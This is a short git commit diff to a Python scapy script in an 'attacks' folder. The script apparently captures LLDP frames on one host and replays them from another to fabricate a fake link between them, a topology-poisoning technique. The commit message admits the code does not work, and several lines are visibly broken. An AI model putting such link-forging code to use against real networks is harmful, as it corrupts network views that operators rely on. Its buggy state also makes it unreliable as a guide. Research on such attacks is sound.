linkfab complet but does not work

--- a/pyscripts/attacks/linkfab3.py.save.2
+++ b/pyscripts/attacks/linkfab3.py.save.2
@@ -1,6 +1,6 @@
 #! /usr/bin/env python
 #creates a fake link between 2 hosts
-#takes the first argument to define the host
+## Args [1] = name of the second host
 
 from scapy.contrib.lldp import *
 import sys
@@ -72,23 +72,29 @@ def linkfabr(ifa):
         ethtype=data[0]['Ethernet']['type']
         if ethtype == 0x88cc:
             print('lldp')
-            with open("/root/lldppack_"+name+"_"+str(lim)+".pk",'w',encoding = 'utf-8') as f:
-                f.write(pkt)
+            with open("/root/lldppack_"+hostname+"_"+str(lim)+".pk",'w',encoding = 'utf-8') as f:
+                f.write(str(pkt))
             
 
 def getlldppack():
     host_2=sys.argv[1]
-    while true:
+    lim = 0
+    while lim<10:
         try:
-            file = "/root/lldppack_"+str(host_2)
+            file = "/root/lldppack_"+str(host_2)+"_"+str(lim)+".pk"
             with open (file,r) as f:
-                pack = f.read(json_pack)
-            json_object = jason.loads(pack)
-        except exp:
-            print("")
+                pack = f.read()
+            sendp(pack,count=1, ifa=ifa)
+            lim = lim +1
+        except e:
+            log = "/root/error.log"
+            with open(log,r) as lf:
+                lf.write(e)
 
+        
 
-name=socket.gethostname()
+hostname = socket.gethostname()
 ifa = get_ifa()
 print(ifa)#ifa = 'enp2s0'
+
 linkfabr(ifa)
